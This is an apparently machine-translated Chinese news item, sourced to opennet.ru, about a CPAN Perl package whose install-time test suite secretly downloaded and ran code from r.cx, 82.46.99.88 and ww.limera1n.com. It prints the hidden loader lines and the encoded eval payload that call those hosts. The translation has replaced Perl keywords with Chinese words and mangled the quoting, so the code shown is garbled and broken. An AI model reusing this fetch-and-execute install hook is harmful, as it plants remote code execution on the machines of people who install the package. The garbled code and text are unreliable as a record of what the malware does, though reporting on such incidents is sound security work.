在透過 CPAN 目錄分發的 Perl 包中
值得注意的是,關於載入有問題代碼的問題出現在
惡意活動歸結為在安裝模組時啟動的測試套件執行期間嘗試從第三方伺服器 (http://r.cx:1/) 下載並執行程式碼。假設最初從外部伺服器下載的程式碼不是惡意的,但現在請求被重定向到 ww.limera1n.com 網域,該網域提供其部分程式碼供執行。
將下載組織到文件中
我的 $prog = __FILE__;
$prog =~ s{[^/]+\.t}{../contrib/RCX.pl}x;
我的 $try = `$^X $prog`;
指定的程式碼導致腳本被執行
使用 lib do{eval&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
該腳本加載
$ perl -MIO::Socket -e’$b=新 IO::Socket::INET 82.46.99.88.”:1″;印出 ;'
eval 解壓縮 u=>q{_<‘)I;G1[)&(];F5W($E/.CI3;V-K970Z.DE….}
解壓縮後,最終執行如下:
print{$b=new IO::Socket::INET"ww.limera1n.com:80″}"GET /iJailBreak
";評估回傳警告$@while$b;1
有問題的套件現已從儲存庫中刪除。
討論起來很有趣
來源: opennet.ru